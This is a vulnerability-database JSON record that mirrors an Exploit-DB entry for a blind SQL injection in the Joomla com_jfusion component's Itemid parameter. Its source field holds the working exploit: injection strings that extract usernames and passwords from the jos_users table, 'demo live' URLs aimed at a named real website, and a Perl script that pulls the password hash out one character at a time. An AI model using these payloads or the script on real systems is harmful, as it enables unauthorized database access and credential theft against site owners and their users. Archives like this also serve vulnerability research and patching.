{"id": "EDB-ID:9324", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla! Component com_jfusion - 'itemID' Blind SQL Injection", "description": "", "published": "2009-08-01T00:00:00", "modified": "2009-08-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/9324", "reporter": "Chip d3 bi0s", "references": [], "cvelist": ["2009-2782"], "immutableFields": [], "lastseen": "2023-04-06T16:51:05", "viewCount": 24, "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "_state": {"dependencies": 1680799876, "score": 1683811524, "epss": 1680804120}, "_internal": {"score_hash": "16354a9340bbaee1e2cdbc99ed202ea8"}, "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/9324.txt", "sourceData": "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nJoomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n\n###################################################\n[+] Author : Chip D3 Bi0s\n[+] Email : chipdebios[alt+64]gmail.com\n[+] Vulnerability : Blind SQL injection\n\n###################################################\n\n\nExample:\nhttp://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code]\nn:valid Itemid\n\nSql code:\n+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*\n+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*\n\netc, etc...\n\nDEMO LIVE:\nhttp://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1\n\n\nhttp://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97\n!False \u00c2\u00a1\u00c2\u00a1\u00c2\u00a1\u00c2\u00a1\n\nhttp://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98\n\u00c2\u00a1True \u00c2\u00a1\u00c2\u00a1\u00c2\u00a1\u00c2\u00a1\n\netc, etc....\n\nI let a script that could save this job::example use\nNote:\nItemid:\tvalid for the Web\ncoincidencia : \tseen in 1 = 1 and not 1 !=\n\n\n\nhttp://wwww.host.org/Path : http://www.cd7.com.ec/\n[-] Introduce Itemid : 66\n[-] Introduce coincidencia : http://www.cd7.com.ec/forum/\n\n+++++++++++++++++++++++++++++++++++++++\n#[!] Produced in South America\n+++++++++++++++++++++++++++++++++++++++\n\n\n#!/usr/bin/perl -w\nuse LWP::UserAgent;\nuse Benchmark;\nmy $t1 = new Benchmark;\n\n\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\nprint \"\\t\\t | Chip d3 Bi0s | \\n\\n\";\nprint \"\\t\\t Joomla Component com_jfusion (Itemid) Blind SQL-injection \\n\\n\";\nprint \"\\t\\t-------------------------------------------------------------\\n\\n\";\n\n\nprint \"http://wwww.host.org/Path : \";chomp(my $target=<STDIN>);\nprint \" [-] Introduce Itemid : \";chomp($z=<STDIN>);\nprint \" [-] Introduce coincidencia : \";chomp($w=<STDIN>);\n\n\n$column_name=\"concat(password)\";\n$table_name=\"jos_users\";\n\n\n$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\n$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\n\nprint \"----------------Inyectando----------------\\n\";\n\n#es Vulnerable?\n $host = $target . \"/index.php?option=com_jfusion&Itemid=\".$z.\"+and+1=1\";\n my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;\n if ($content =~ /$regexp/) {\n\n$host = $target . \"/index.php?option=com_jfusion&Itemid=\".$z.\"+and+1=2\";\n my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;\n if ($content =~ /$regexp/) {print \" [-] Exploit Fallo :(\\n\";}\n\nelse\n\n{print \" [-] Vulnerable :)\\n\";\n\nfor ($x=1;$x<=32;$x++)\n\t{\n\n $host = $target . \"/index.php?option=com_jfusion&Itemid=\".$z.\"+and+ascii(substring((SELECT+\".$column_name.\"+from+\".$table_name.\"+limit+0,1),\".$x.\",1))>57\";\n my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;\n print \" [!] \";if($x <= 9 ) {print \"0$x\";}else{print $x;}#para alininear 0..9 con los 10-32\n\n if ($content =~ /$regexp/)\n {\n\n for ($c=97;$c<=102;$c++)\n\n{\n $host = $target . \"/index.php?option=com_jfusion&Itemid=\".$z.\"+and+ascii(substring((SELECT+\".$column_name.\"+from+\".$table_name.\"+limit+0,1),\".$x.\",1))=\".$c.\" \";\n my $res = $b->request(HTTP::Request->new(GET=>$host));\n my $content = $res->content;\n my $regexp = $w;\n\n\n if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print \"-Caracter: $char\\n\"; $c=102;}\n }\n\n\n }\nelse\n{\n\nfor ($c=48;$c<=57;$c++)\n\n{\n $host = $target . \"/index.php?option=com_jfusion&Itemid=\".$z.\"+and+ascii(substring((SELECT+\".$column_name.\"+from+\".$table_name.\"+limit+0,1),\".$x.\",1))=\".$c.\" \";\n my $res = $b->request(HTTP::Request->new(GET=>$host));\n my $content = $res->content;\n my $regexp = $w;\n\n if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print \"-Caracter: $char\\n\"; $c=57;}\n }\n\n\n}\n\n\t}\nprint \" [+] Password :\".\" \".join('', @caracter) . \"\\n\";\nmy $t2 = new Benchmark;\nmy $tt = timediff($t2, $t1);\nprint \"El script tomo:\",timestr($tt),\"\\n\";\n\n}\n}\n\nelse\n\n{print \" [-] Exploit Fallo :(\\n\";}\n\n# milw0rm.com [2009-08-01]", "osvdbidlist": ["57156"], "exploitType": "webapps", "verified": true}
{}
Joomla! Component com_jfusion - 'itemID' Blind SQL Injection